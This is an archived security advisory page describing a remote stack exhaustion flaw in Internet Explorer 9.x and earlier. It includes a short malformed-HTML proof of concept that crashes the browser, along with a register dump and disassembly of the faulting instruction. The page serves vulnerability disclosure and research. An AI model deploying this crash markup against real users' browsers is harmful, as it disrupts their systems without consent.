what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Microsoft Internet Explorer 9.x Stack Exhaustion

Microsoft Internet Explorer 9.x Stack Exhaustion
Posted Dec 19, 2012
Authored by Jean Pascal Pereira

Microsoft Internet Explorer 9.x suffers from a remote stack exhaustion vulnerability.

tags | exploit, remote, overflow
SHA-256 | d92f15f413457c5e0e27867c732c549570fd1dd935370f20ae2973bbf1b93532
Download | Favorite | View

Microsoft Internet Explorer 9.x Stack Exhaustion

Change Mirror Download
----------------------------------------------------------------------
Microsoft Internet Explorer 9.x <= Remote Stack Overflow Vulnerability
----------------------------------------------------------------------

Author: Jean Pascal Pereira <pereira@secbiz.de>

Vendor: Microsoft Internet Explorer 9.x and below

Description:

The application is prone to a remote stack overflow vulnerability.

Successful exploitation may lead to arbitrary code execution.

----------------------------------------------------------------------
Proof Of Concept:
----------------------------------------------------------------------

<table></for xmlns="1">
<td><datetime><colgroup>
<id><dd><col>
</table><object>
<hr><base>

----------------------------------------------------------------------
Register Dump:
----------------------------------------------------------------------

EAX 800706BE
ECX 763FCDB3 RPCRT4.763FCDB3
EDX 00000000
EBX 0604393C
ESP 003FDDD4
EBP 003FDDE0
ESI 003FDE30
EDI 761AFA10 ole32.761AFA10
EIP 7629CF51 ole32.7629CF51

----------------------------------------------------------------------
Crash Instruction:
----------------------------------------------------------------------

7629CF36   8B4D E4          MOV ECX,DWORD PTR SS:[EBP-1C]
7629CF39   24 04            AND AL,4
7629CF3B   0FB6C0           MOVZX EAX,AL
7629CF3E   F7D8             NEG EAX
7629CF40   1BC0             SBB EAX,EAX
7629CF42   25 0A010180      AND EAX,8001010A
7629CF47   8901             MOV DWORD PTR DS:[ECX],EAX
7629CF49   8B45 E8          MOV EAX,DWORD PTR SS:[EBP-18]
7629CF4C   50               PUSH EAX
7629CF4D   53               PUSH EBX
7629CF4E   8975 D8          MOV DWORD PTR SS:[EBP-28],ESI
7629CF51   FF70 5C          PUSH DWORD PTR DS:[EAX+5C]

----------------------------------------------------------------------
At 0x7629CF51, a read access violation occurs.
----------------------------------------------------------------------

Jean Pascal Pereira <pereira@secbiz.de> || http://www.0xffe4.org
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close